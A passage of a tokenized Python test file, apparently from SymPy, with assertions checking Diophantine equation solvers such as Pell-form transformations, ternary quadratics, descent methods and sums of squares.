<EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:1> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT> , - <NUM_LIT:4> ) == [ ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> assert diop_bf_DN ( - <NUM_LIT:1> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:0> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , t ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:4> , <NUM_LIT:0> , t ) == [ ( <NUM_LIT:2> * t , t ) , ( - <NUM_LIT:2> * t , t ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:3> , 
<NUM_LIT:0> , t ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert diop_bf_DN ( <NUM_LIT:1> , - <NUM_LIT:2> , t ) == [ ] <EOL> def test_length ( ) : <EOL> assert length ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> ) == <NUM_LIT:1> <EOL> assert length ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) == <NUM_LIT:3> <EOL> assert length ( - <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT> ) == <NUM_LIT:5> <EOL> assert length ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT> ) == <NUM_LIT:6> <EOL> assert length ( - <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT> ) == <NUM_LIT> <EOL> assert length ( <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:11> ) == <NUM_LIT> <EOL> assert length ( - <NUM_LIT> , <NUM_LIT:5> , <NUM_LIT> ) == <NUM_LIT:4> <EOL> assert length ( <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> def is_pell_transformation_ok ( eq ) : <EOL> """<STR_LIT>""" <EOL> A , B = transformation_to_DN ( eq ) <EOL> u = ( A * Matrix ( [ X , Y ] ) + B ) [ <NUM_LIT:0> ] <EOL> v = ( A * Matrix ( [ X , Y ] ) + B ) [ <NUM_LIT:1> ] <EOL> simplified = diop_simplify ( eq . subs ( zip ( ( x , y ) , ( u , v ) ) ) ) <EOL> coeff = dict ( [ reversed ( t . as_independent ( * [ X , Y ] ) ) for t in simplified . args ] ) <EOL> for term in [ X * Y , X , Y ] : <EOL> if term in coeff . keys ( ) : <EOL> return False <EOL> for term in [ X ** <NUM_LIT:2> , Y ** <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> if term not in coeff . 
keys ( ) : <EOL> coeff [ term ] = <NUM_LIT:0> <EOL> if coeff [ X ** <NUM_LIT:2> ] != <NUM_LIT:0> : <EOL> return divisible ( coeff [ Y ** <NUM_LIT:2> ] , coeff [ X ** <NUM_LIT:2> ] ) and divisible ( coeff [ <NUM_LIT:1> ] , coeff [ X ** <NUM_LIT:2> ] ) <EOL> return True <EOL> def test_transformation_to_pell ( ) : <EOL> assert is_pell_transformation_ok ( - <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x - <NUM_LIT:2> * y - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( - <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( - x ** <NUM_LIT:2> + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * x * y + <NUM_LIT:5> * y ** <NUM_LIT:2> - <NUM_LIT:5> * x - <NUM_LIT:10> * y + <NUM_LIT:5> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:30> * x * y + y ** <NUM_LIT:2> - <NUM_LIT:3> * y - <NUM_LIT> * x - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT:7> * y - <NUM_LIT> * x - <NUM_LIT> ) <EOL> assert is_pell_transformation_ok ( <NUM_LIT:15> * x ** <NUM_LIT:2> - <NUM_LIT:9> * x * y + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * x - <NUM_LIT> * y - <NUM_LIT> ) <EOL> def test_find_DN ( ) : <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x - y ** <NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:5> ) == ( <NUM_LIT:3> , <NUM_LIT:5> ) <EOL> assert find_DN ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - <NUM_LIT:4> * y ** <NUM_LIT:2> - <NUM_LIT:7> ) == ( <NUM_LIT:5> , <NUM_LIT:7> ) <EOL> assert find_DN ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:8> * x * y - 
y ** <NUM_LIT:2> - <NUM_LIT:9> ) == ( <NUM_LIT:20> , <NUM_LIT> ) <EOL> assert find_DN ( <NUM_LIT:7> * x ** <NUM_LIT:2> - <NUM_LIT:2> * x * y - y ** <NUM_LIT:2> - <NUM_LIT:12> ) == ( <NUM_LIT:8> , <NUM_LIT> ) <EOL> assert find_DN ( - <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:4> * x * y - y ** <NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> assert find_DN ( - <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + y ** <NUM_LIT:2> + <NUM_LIT:2> * x - <NUM_LIT:2> * y - <NUM_LIT> ) == ( <NUM_LIT> , - <NUM_LIT> ) <EOL> def test_ldescent ( ) : <EOL> u = ( [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , - <NUM_LIT:11> ) , ( <NUM_LIT> , - <NUM_LIT> ) , ( <NUM_LIT:4> , - <NUM_LIT:7> ) , ( - <NUM_LIT:7> , <NUM_LIT:4> ) , ( <NUM_LIT> , - <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:4> , <NUM_LIT:32> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT> ) ] ) <EOL> for a , b in u : <EOL> w , x , y = ldescent ( a , b ) <EOL> assert a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> == w ** <NUM_LIT:2> <EOL> assert ldescent ( - <NUM_LIT:1> , - <NUM_LIT:1> ) is None <EOL> def test_diop_ternary_quadratic_normal ( ) : <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:5> * x ** <NUM_LIT:2> + <NUM_LIT:4> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:6> * y ** <NUM_LIT:2> - <NUM_LIT:3> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:5> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert 
check_solutions ( <NUM_LIT:16> * x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:6> * x ** <NUM_LIT:2> - y ** <NUM_LIT:2> + <NUM_LIT:10> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:12> * y ** <NUM_LIT:2> - <NUM_LIT:9> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> def is_normal_transformation_ok ( eq ) : <EOL> A = transformation_to_normal ( eq ) <EOL> X , Y , Z = A * Matrix ( [ x , y , z ] ) <EOL> simplified = diop_simplify ( eq . subs ( zip ( ( x , y , z ) , ( X , Y , Z ) ) ) ) <EOL> coeff = dict ( [ reversed ( t . as_independent ( * [ X , Y , Z ] ) ) for t in simplified . args ] ) <EOL> for term in [ X * Y , Y * Z , X * Z ] : <EOL> if term in coeff . 
keys ( ) : <EOL> return False <EOL> return True <EOL> def test_transformation_to_normal ( ) : <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> * x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:100> * z ** <NUM_LIT:2> ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT> * y * z ) <EOL> assert is_normal_transformation_ok ( <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:100> * z ** <NUM_LIT:2> - <NUM_LIT:12> * x * y ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert is_normal_transformation_ok ( z ** <NUM_LIT:2> + <NUM_LIT> * x * y - <NUM_LIT> * y * z + x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - y * z - x * z ) <EOL> assert is_normal_transformation_ok ( x ** <NUM_LIT:2> + <NUM_LIT:2> * y * z + <NUM_LIT:3> * z ** <NUM_LIT:2> ) <EOL> assert is_normal_transformation_ok ( x * y + <NUM_LIT:2> * x * z + <NUM_LIT:3> * y * z ) <EOL> assert is_normal_transformation_ok ( <NUM_LIT:2> * x * z + <NUM_LIT:3> * y * z ) <EOL> def test_diop_ternary_quadratic ( ) : <EOL> assert check_solutions ( <NUM_LIT:2> * x ** <NUM_LIT:2> + z ** <NUM_LIT:2> + y ** <NUM_LIT:2> - <NUM_LIT:4> * x * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - z ** <NUM_LIT:2> - x * y - y * z ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> - x * y - y * z - x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y * z - x * z ) <EOL> assert check_solutions ( <NUM_LIT:5> * x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y - x * z ) <EOL> assert check_solutions ( <NUM_LIT:4> * x ** <NUM_LIT:2> - <NUM_LIT:5> * y ** <NUM_LIT:2> - x * z ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - 
z ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:5> * y * z - <NUM_LIT:7> * y * z ) <EOL> assert check_solutions ( <NUM_LIT:8> * x ** <NUM_LIT:2> - <NUM_LIT:12> * y * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:8> * x * y - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> + <NUM_LIT> * z * y - <NUM_LIT:8> * x * y ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x * y + <NUM_LIT:2> * z * y + <NUM_LIT:5> * x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - <NUM_LIT> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> * x * y - <NUM_LIT:16> * y * z + <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( x * y - <NUM_LIT:7> * y * z + <NUM_LIT> * x * z ) <EOL> assert diop_ternary_quadratic_normal ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> ) == ( None , None , None ) <EOL> assert diop_ternary_quadratic_normal ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> ) is None <EOL> raises ( ValueError , lambda : <EOL> _diop_ternary_quadratic_normal ( ( x , y , z ) , <EOL> { x * y : <NUM_LIT:1> , x ** <NUM_LIT:2> : <NUM_LIT:2> , y ** <NUM_LIT:2> : <NUM_LIT:3> , z ** <NUM_LIT:2> : <NUM_LIT:0> } ) ) <EOL> eq = - <NUM_LIT:2> * x * y - <NUM_LIT:6> * x * z + <NUM_LIT:7> * y ** <NUM_LIT:2> - <NUM_LIT:3> * y * z + <NUM_LIT:4> * z ** <NUM_LIT:2> <EOL> assert diop_ternary_quadratic ( eq ) == ( <NUM_LIT:7> , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> assert diop_ternary_quadratic_normal ( <NUM_LIT:4> * x ** <NUM_LIT:2> + <NUM_LIT:5> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) 
<EOL> assert diop_ternary_quadratic ( x * y + <NUM_LIT:2> * y * z ) == ( - <NUM_LIT:2> , <NUM_LIT:0> , n1 ) <EOL> eq = - <NUM_LIT:5> * x * y - <NUM_LIT:8> * x * z - <NUM_LIT:3> * y * z + <NUM_LIT:8> * z ** <NUM_LIT:2> <EOL> assert parametrize_ternary_quadratic ( eq ) == ( <NUM_LIT:64> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q , - <NUM_LIT:64> * p * q + <NUM_LIT:64> * q ** <NUM_LIT:2> , <NUM_LIT> * p * q ) <EOL> assert diop_solve ( x * y + <NUM_LIT:2> * y * z ) == ( - <NUM_LIT:4> * p * q , - <NUM_LIT:2> * n1 * p ** <NUM_LIT:2> + <NUM_LIT:2> * p ** <NUM_LIT:2> , <NUM_LIT:2> * p * q ) <EOL> def test_square_factor ( ) : <EOL> assert square_factor ( <NUM_LIT:1> ) == square_factor ( - <NUM_LIT:1> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:0> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:5> ) == square_factor ( - <NUM_LIT:5> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:4> ) == square_factor ( - <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT:12> ) == square_factor ( - <NUM_LIT:12> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT:6> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:3> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:7> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT> <EOL> assert square_factor ( factorint ( - <NUM_LIT:12> ) ) == <NUM_LIT:2> <EOL> def test_parametrize_ternary_quadratic ( ) : <EOL> assert check_solutions ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:5> * y * z - <NUM_LIT:7> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> 
- z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> + <NUM_LIT> * z * y - <NUM_LIT:8> * x * y ) <EOL> assert check_solutions ( <NUM_LIT:8> * x * y + z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT:11> * x * y - <NUM_LIT> * y * z - <NUM_LIT> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x * y + <NUM_LIT:2> * z * y + <NUM_LIT:5> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> def test_no_square_ternary_quadratic ( ) : <EOL> assert check_solutions ( <NUM_LIT:2> * x * y + y * z - <NUM_LIT:3> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x * y - <NUM_LIT> * y * z - <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x * y + <NUM_LIT> * y * z ) <EOL> assert check_solutions ( x * y + y * z + z * x ) <EOL> assert check_solutions ( <NUM_LIT> * x * y + <NUM_LIT> * y * z + <NUM_LIT> * x * z ) <EOL> def test_descent ( ) : <EOL> u = ( [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , - <NUM_LIT:11> ) , ( <NUM_LIT> , - <NUM_LIT> ) , ( <NUM_LIT> , - <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT> ) ] ) <EOL> for a , b in u : <EOL> w , x , y = descent ( a , b ) <EOL> assert a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> == w ** <NUM_LIT:2> <EOL> raises ( TypeError , lambda : descent ( - <NUM_LIT:1> , - <NUM_LIT:3> ) ) <EOL> raises ( ZeroDivisionError , lambda : descent ( <NUM_LIT:0> , <NUM_LIT:3> ) ) <EOL> raises ( TypeError , lambda : descent ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> def test_diophantine ( ) : <EOL> assert 
check_solutions ( ( x - y ) * ( y - z ) * ( z - x ) ) <EOL> assert check_solutions ( ( x - y ) * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) ) <EOL> assert check_solutions ( ( x - <NUM_LIT:3> * y + <NUM_LIT:7> * z ) * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> + <NUM_LIT:7> * x * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y + y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( z * ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:15> ) ) <EOL> assert check_solutions ( x * ( <NUM_LIT:2> * y - <NUM_LIT:2> * z + <NUM_LIT:5> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) * ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:15> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) * ( y - <NUM_LIT:7> * z ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) * ( x - <NUM_LIT:7> * y - <NUM_LIT:3> * z + <NUM_LIT:4> * w ) ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + <NUM_LIT:4> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x + <NUM_LIT:1> ) <EOL> assert diophantine ( x - y ) == diophantine ( Eq ( x , y ) ) <EOL> assert diophantine ( <NUM_LIT:3> * x * pi - <NUM_LIT:2> * y * pi ) == set ( [ ( <NUM_LIT:2> * t_0 , <NUM_LIT:3> * t_0 ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:2> + <NUM_LIT:15> * x / <NUM_LIT> - <NUM_LIT:3> ) == set ( ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> <EOL> coeff = eq . 
as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:9> , <NUM_LIT:7> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <EOL> <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT:9> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT:7> * q ** <NUM_LIT:2> , <EOL> <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q - <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> assert diophantine ( eq ) == set ( [ ( <EOL> <NUM_LIT:2> * p ** <NUM_LIT:2> - q ** <NUM_LIT:2> , - <NUM_LIT:2> * p ** <NUM_LIT:2> + <NUM_LIT:4> * p * q - q ** <NUM_LIT:2> , <EOL> <NUM_LIT:4> * p ** <NUM_LIT:2> - <NUM_LIT:4> * p * q + <NUM_LIT:2> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT> * p * q - <EOL> <NUM_LIT> * q ** <NUM_LIT:2> , <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> <EOL> coeff = eq . 
as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT> * p * q - <NUM_LIT> * q ** <NUM_LIT:2> , <EOL> <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:12> * z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p * q , <NUM_LIT:2> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , p ** <NUM_LIT:2> + <NUM_LIT:12> * q ** <NUM_LIT:2> ) ] ) <EOL> raises ( NotImplementedError , lambda : diophantine ( x * y ** <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> assert diophantine ( <NUM_LIT:1> / x ) == set ( ) <EOL> assert diophantine ( <NUM_LIT:1> / x + <NUM_LIT:1> / y - S . Half ) <EOL> set ( [ ( <NUM_LIT:6> , <NUM_LIT:3> ) , ( - <NUM_LIT:2> , <NUM_LIT:1> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , - <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:6> ) ] ) <EOL> def test_general_pythagorean ( ) : <EOL> from sympy . 
abc import a , b , c , d , e <EOL> assert check_solutions ( a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> - <NUM_LIT> * d ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> - <NUM_LIT:16> * d ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> ) <EOL> assert check_solutions ( - e ** <NUM_LIT:2> + <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> + <NUM_LIT> * d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:16> * a ** <NUM_LIT:2> - b ** <NUM_LIT:2> + <NUM_LIT:9> * c ** <NUM_LIT:2> + d ** <NUM_LIT:2> + <NUM_LIT> * e ** <NUM_LIT:2> ) <EOL> def test_diop_general_sum_of_squares_quick ( ) : <EOL> for i in range ( <NUM_LIT:3> , <NUM_LIT:10> ) : <EOL> assert check_solutions ( sum ( i ** <NUM_LIT:2> for i in symbols ( '<STR_LIT>' % i ) ) - i ) <EOL> raises ( ValueError , lambda : _diop_general_sum_of_squares ( ( x , y ) , <NUM_LIT:2> ) ) <EOL> assert _diop_general_sum_of_squares ( ( x , y , z ) , - <NUM_LIT:2> ) == set ( ) <EOL> eq = x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - ( <NUM_LIT:1> + <NUM_LIT:4> + <NUM_LIT:9> ) <EOL> assert diop_general_sum_of_squares ( eq ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , 